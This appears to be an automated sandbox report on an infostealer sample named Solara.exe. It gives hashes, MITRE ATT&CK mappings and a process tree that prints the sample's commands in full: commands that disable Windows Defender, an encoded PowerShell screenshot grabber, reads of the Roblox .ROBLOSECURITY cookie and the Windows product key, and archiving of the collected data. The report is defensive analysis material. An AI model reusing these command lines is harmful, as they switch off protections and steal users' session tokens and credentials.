Analysis

  • max time kernel
    138s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 13:59

General

  • Target

    Solara.exe

  • Size

    7.4MB

  • MD5

    668d1db9a3a70c9ecf654475f3369485

  • SHA1

    31819dd4a5948424b3aac16e99ded3839ad7a8c1

  • SHA256

    379d24f9014f75bb932c77c65f7d9508d456cba86ec45b22c542a035626140d1

  • SHA512

    a2bf16b8b092326372152758d1485893aa578540fa5997041a60e03a1f527ee8cf3a38221deecb9a0d1d27561c75948241a0e08c9270a924cd3b9cb4744306e6

  • SSDEEP

    196608:RrCO0cDeKG4+Ljv+bhqNVoBKUh8mz4Iv9Plu1D7AL:0ieT4CL+9qz8/b4IzuRAL

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Solara.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3588
    • C:\Users\Admin\AppData\Local\Temp\Solara.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:624
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4828
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4052
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4556
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3344
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4380
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4552
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:756
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3136
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:1848
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4772
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:1172
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1876
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:1436
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2476
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:3816
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ​ .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2156
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ​ .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4544
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4456
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:3764
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2892
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:2032
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1680
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:3192
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4520
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4564
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:3968
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:2012
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:1504
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1496
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    3⤵
                      PID:3932
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                          PID:3364
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:540
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:4772
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:3340
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2508
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ydqurwbd\ydqurwbd.cmdline"
                                5⤵
                                  PID:2580
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A64.tmp" "c:\Users\Admin\AppData\Local\Temp\ydqurwbd\CSCF07505EBA1584B67AAA4A444641043.TMP"
                                    6⤵
                                      PID:4636
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:3184
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:3948
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4996
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:396
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:4872
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:1020
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:4560
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:4620
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:4576
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:3708
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                    3⤵
                                                      PID:4512
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1964
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                      3⤵
                                                        PID:1544
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2728
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "getmac"
                                                        3⤵
                                                          PID:996
                                                          • C:\Windows\system32\getmac.exe
                                                            getmac
                                                            4⤵
                                                              PID:3272
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35882\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\iQdvS.zip" *"
                                                            3⤵
                                                              PID:5108
                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI35882\rar.exe
                                                                C:\Users\Admin\AppData\Local\Temp\_MEI35882\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\iQdvS.zip" *
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:3356
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                              3⤵
                                                                PID:3364
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic os get Caption
                                                                  4⤵
                                                                    PID:1608
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                  3⤵
                                                                    PID:1360
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic computersystem get totalphysicalmemory
                                                                      4⤵
                                                                        PID:1572
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                      3⤵
                                                                        PID:2708
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic csproduct get uuid
                                                                          4⤵
                                                                            PID:3572
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                          3⤵
                                                                            PID:4720
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                              4⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1588
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                            3⤵
                                                                              PID:4888
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic path win32_VideoController get name
                                                                                4⤵
                                                                                • Detects videocard installed
                                                                                PID:2600
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                              3⤵
                                                                                PID:1660
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                  4⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:3188
                                                                          • C:\Windows\servicing\TrustedInstaller.exe
                                                                            C:\Windows\servicing\TrustedInstaller.exe
                                                                            1⤵
                                                                              PID:2012

                                                                            Network

                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                            Execution

                                                                            Command and Scripting Interpreter

                                                                            1
                                                                            T1059

                                                                            PowerShell

                                                                            1
                                                                            T1059.001

                                                                            Credential Access

                                                                            Unsecured Credentials

                                                                            2
                                                                            T1552

                                                                            Credentials In Files

                                                                            2
                                                                            T1552.001

                                                                            Discovery

                                                                            System Information Discovery

                                                                            3
                                                                            T1082

                                                                            Process Discovery

                                                                            1
                                                                            T1057

                                                                            Collection

                                                                            Data from Local System

                                                                            2
                                                                            T1005

                                                                            Command and Control

                                                                            Web Service

                                                                            1
                                                                            T1102

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                              Filesize
